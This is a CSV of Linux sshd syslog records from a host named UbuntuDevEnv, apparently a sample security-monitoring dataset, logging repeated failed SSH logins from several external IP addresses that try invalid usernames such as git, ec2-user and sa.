+16966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:46,UbuntuDevEnv,2019-06-26 08:18:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:46,UbuntuDevEnv,2019-06-26 08:18:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,54759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+16968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:48,UbuntuDevEnv,2019-06-26 08:18:48,auth,UbuntuDevEnv,info,Failed password for invalid user david from 185.103.243.78 port 35964 ssh2,54759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,185.103.243.7,35964,,
+16969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:48,UbuntuDevEnv,2019-06-26 08:18:48,auth,UbuntuDevEnv,info,Disconnected from invalid user david 185.103.243.78 port 35964 [preauth],54759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,185.103.243.7,35964,,
+16970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:18:48,UbuntuDevEnv,2019-06-26 08:18:48,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 35964:11: Bye Bye [preauth],54759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,35964,,
+16971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:03,UbuntuDevEnv,2019-06-26 08:20:02,auth,UbuntuDevEnv,info,Connection closed by 183.47.14.74 port 60418 [preauth],55312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,60418,,
+16972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:35,UbuntuDevEnv,2019-06-26 08:20:34,auth,UbuntuDevEnv,info,Invalid user 123 from 185.103.243.78 port 51566,55524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123,185.103.243.7,51566,,
+16973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:35,UbuntuDevEnv,2019-06-26 08:20:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:35,UbuntuDevEnv,2019-06-26 08:20:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,55524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+16975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:37,UbuntuDevEnv,2019-06-26 08:20:36,auth,UbuntuDevEnv,info,Failed password for invalid user 123 from 185.103.243.78 port 51566 ssh2,55524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123,185.103.243.7,51566,,
+16976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:37,UbuntuDevEnv,2019-06-26 08:20:36,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 51566:11: Bye Bye [preauth],55524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,51566,,
+16977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:37,UbuntuDevEnv,2019-06-26 08:20:36,auth,UbuntuDevEnv,info,Disconnected from invalid user 123 185.103.243.78 port 51566 [preauth],55524,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123,185.103.243.7,51566,,
+16978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:43,UbuntuDevEnv,2019-06-26 08:20:42,auth,UbuntuDevEnv,info,Invalid user shashi from 143.0.52.117 port 60154,55560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shashi,143.0.52.1,60154,,
+16979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:43,UbuntuDevEnv,2019-06-26 08:20:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:43,UbuntuDevEnv,2019-06-26 08:20:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,55560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+16981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:44,UbuntuDevEnv,2019-06-26 08:20:44,auth,UbuntuDevEnv,info,Failed password for invalid user shashi from 143.0.52.117 port 60154 ssh2,55560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shashi,143.0.52.1,60154,,
+16982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:45,UbuntuDevEnv,2019-06-26 08:20:44,auth,UbuntuDevEnv,info,Disconnected from invalid user shashi 143.0.52.117 port 60154 [preauth],55560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shashi,143.0.52.1,60154,,
+16983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:20:45,UbuntuDevEnv,2019-06-26 08:20:44,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 60154:11: Bye Bye [preauth],55560,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,60154,,
+16984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:21:54,UbuntuDevEnv,2019-06-26 08:21:53,auth,UbuntuDevEnv,info,Did not receive identification string from 183.47.14.74 port 40133,55793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,40133,,
+16985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:11,UbuntuDevEnv,2019-06-26 08:22:11,auth,UbuntuDevEnv,info,Invalid user hl from 185.103.243.78 port 38930,55861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hl,185.103.243.7,38930,,
+16986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:11,UbuntuDevEnv,2019-06-26 08:22:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:11,UbuntuDevEnv,2019-06-26 08:22:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,55861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+16988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:13,UbuntuDevEnv,2019-06-26 08:22:13,auth,UbuntuDevEnv,info,Failed password for invalid user hl from 185.103.243.78 port 38930 ssh2,55861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hl,185.103.243.7,38930,,
+16989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:13,UbuntuDevEnv,2019-06-26 08:22:13,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 38930:11: Bye Bye [preauth],55861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,38930,,
+16990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:13,UbuntuDevEnv,2019-06-26 08:22:13,auth,UbuntuDevEnv,info,Disconnected from invalid user hl 185.103.243.78 port 38930 [preauth],55861,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hl,185.103.243.7,38930,,
+16991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:31,UbuntuDevEnv,2019-06-26 08:22:31,auth,UbuntuDevEnv,info,Invalid user desktop from 143.0.52.117 port 40459,55939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,desktop,143.0.52.1,40459,,
+16992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:31,UbuntuDevEnv,2019-06-26 08:22:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:31,UbuntuDevEnv,2019-06-26 08:22:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,55939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+16994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:34,UbuntuDevEnv,2019-06-26 08:22:33,auth,UbuntuDevEnv,info,Failed password for invalid user desktop from 143.0.52.117 port 40459 ssh2,55939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,desktop,143.0.52.1,40459,,
+16995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:34,UbuntuDevEnv,2019-06-26 08:22:33,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 40459:11: Bye Bye [preauth],55939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,40459,,
+16996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:22:34,UbuntuDevEnv,2019-06-26 08:22:33,auth,UbuntuDevEnv,info,Disconnected from invalid user desktop 143.0.52.117 port 40459 [preauth],55939,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,desktop,143.0.52.1,40459,,
+16997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:23:45,UbuntuDevEnv,2019-06-26 08:23:45,auth,UbuntuDevEnv,info,Connection closed by 183.47.14.74 port 48087 [preauth],56179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,48087,,
+16998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:23:52,UbuntuDevEnv,2019-06-26 08:23:51,auth,UbuntuDevEnv,info,Invalid user git from 185.103.243.78 port 54528,56215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,185.103.243.7,54528,,
+16999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:23:52,UbuntuDevEnv,2019-06-26 08:23:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:23:52,UbuntuDevEnv,2019-06-26 08:23:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,56215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:23:54,UbuntuDevEnv,2019-06-26 08:23:54,auth,UbuntuDevEnv,info,Failed password for invalid user git from 185.103.243.78 port 54528 ssh2,56215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,185.103.243.7,54528,,
+17002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:23:54,UbuntuDevEnv,2019-06-26 08:23:54,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 54528:11: Bye Bye [preauth],56215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,54528,,
+17003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:23:54,UbuntuDevEnv,2019-06-26 08:23:54,auth,UbuntuDevEnv,info,Disconnected from invalid user git 185.103.243.78 port 54528 [preauth],56215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,185.103.243.7,54528,,
+17004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:24:18,UbuntuDevEnv,2019-06-26 08:24:17,auth,UbuntuDevEnv,info,Invalid user vmaloba from 143.0.52.117 port 48997,56314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmaloba,143.0.52.1,48997,,
+17005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:24:18,UbuntuDevEnv,2019-06-26 08:24:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:24:18,UbuntuDevEnv,2019-06-26 08:24:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,56314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:24:20,UbuntuDevEnv,2019-06-26 08:24:19,auth,UbuntuDevEnv,info,Failed password for invalid user vmaloba from 143.0.52.117 port 48997 ssh2,56314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmaloba,143.0.52.1,48997,,
+17008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:24:20,UbuntuDevEnv,2019-06-26 08:24:20,auth,UbuntuDevEnv,info,Disconnected from invalid user vmaloba 143.0.52.117 port 48997 [preauth],56314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmaloba,143.0.52.1,48997,,
+17009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:24:20,UbuntuDevEnv,2019-06-26 08:24:20,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 48997:11: Bye Bye [preauth],56314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,48997,,
+17010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:35,UbuntuDevEnv,2019-06-26 08:25:34,auth,UbuntuDevEnv,info,Invalid user ec2-user from 185.103.243.78 port 41900,56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ec2,185.103.243.7,41900,,
+17011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:35,UbuntuDevEnv,2019-06-26 08:25:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:35,UbuntuDevEnv,2019-06-26 08:25:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:36,UbuntuDevEnv,2019-06-26 08:25:36,auth,UbuntuDevEnv,info,Failed password for invalid user ec2-user from 185.103.243.78 port 41900 ssh2,56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ec2,185.103.243.7,41900,,
+17014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:36,UbuntuDevEnv,2019-06-26 08:25:36,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 41900:11: Bye Bye [preauth],56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,41900,,
+17015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:36,UbuntuDevEnv,2019-06-26 08:25:36,auth,UbuntuDevEnv,info,Disconnected from invalid user ec2-user 185.103.243.78 port 41900 [preauth],56585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ec2,185.103.243.7,41900,,
+17016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:41,UbuntuDevEnv,2019-06-26 08:25:40,auth,UbuntuDevEnv,info,Invalid user sa from 183.47.14.74 port 56039,56599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,183.47.14.7,56039,,
+17017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:41,UbuntuDevEnv,2019-06-26 08:25:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,56599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:41,UbuntuDevEnv,2019-06-26 08:25:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:43,UbuntuDevEnv,2019-06-26 08:25:43,auth,UbuntuDevEnv,info,Failed password for invalid user sa from 183.47.14.74 port 56039 ssh2,56599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,183.47.14.7,56039,,
+17020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:43,UbuntuDevEnv,2019-06-26 08:25:43,auth,UbuntuDevEnv,info,Disconnected from invalid user sa 183.47.14.74 port 56039 [preauth],56599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,183.47.14.7,56039,,
+17021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:25:43,UbuntuDevEnv,2019-06-26 08:25:43,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 56039:11: Bye Bye [preauth],56599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,56039,,
+17022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:08,UbuntuDevEnv,2019-06-26 08:26:08,auth,UbuntuDevEnv,info,Invalid user ejabberd from 143.0.52.117 port 57536,56712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ejabberd,143.0.52.1,57536,,
+17023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:08,UbuntuDevEnv,2019-06-26 08:26:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,56712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:08,UbuntuDevEnv,2019-06-26 08:26:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,56712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:26:10,UbuntuDevEnv,2019-06-26 08:26:09,auth,UbuntuDevEnv,info,Failed password for invalid user ejabberd from 143.0.52.117 port 57536 ssh2,56712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ejabberd,143.0.52.1,57536,,
